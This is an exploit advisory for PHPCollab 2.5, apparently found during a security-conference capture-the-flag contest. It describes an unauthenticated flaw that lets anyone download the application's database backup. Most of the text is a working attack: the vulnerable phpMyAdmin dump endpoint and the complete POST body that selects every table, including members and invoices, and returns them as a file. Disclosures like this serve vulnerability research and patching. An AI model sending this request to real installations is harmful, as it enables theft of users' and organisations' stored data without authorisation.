PHPCollab 2.5 Database Backup Disclosure

`# Exploit Title: phpcollab Unauthenticated Database Backup Download  
# Date: 3/5/2012  
# Author: team ' and 1=1--  
# Software Link: http://www.phpcollab.com/  
# Version: 2.5  
# Vulnerability was found during the AthCon IT Security Conference CTF  
#CTF organizer: echothrust  
  
During AthCon CTF the team ' and 1=1-- identified that a potential  
attacker is able to  
download the database backup of the phpcollab instance that is installed  
under the following URL: http://xxx.xxx.xxx.xxx/phpcollab/  
  
The Vulnerability can be exploited by sending the following POST Request:  
http://xxx.xxx.xxx.xxx/phpcollab/includes/phpmyadmin/tbl_dump.php  
POST DATA:  
table_select%5B%5D=assignments&table_select%5B%5D=bookmarks&table_select%5B  
%5D=bookmarks_categories&table_select%5B%5D=calendar&table_select%5B%5D=fil  
es&table_select%5B%5D=invoices&table_select%5B%5D=invoices_items&table_sele  
ct%5B%5D=logs&table_select%5B%5D=members&table_select%5B%5D=newsdeskcomment  
s&table_select%5B%5D=newsdeskposts&table_select%5B%5D=notes&table_select%5B  
%5D=notifications&table_select%5B%5D=organizations&table_select%5B%5D=phase  
s&table_select%5B%5D=posts&table_select%5B%5D=projects&table_select%5B%5D=r  
eports&table_select%5B%5D=services&table_select%5B%5D=sorting&table_select%  
5B%5D=subtasks&table_select%5B%5D=support_posts&table_select%5B%5D=support_  
requests&table_select%5B%5D=tasks&table_select%5B%5D=teams&table_select%5B%  
5D=topics&table_select%5B%5D=updates&what=data&drop=1&asfile=sendit&server=  
1&lang=en&db=phpcollab  
`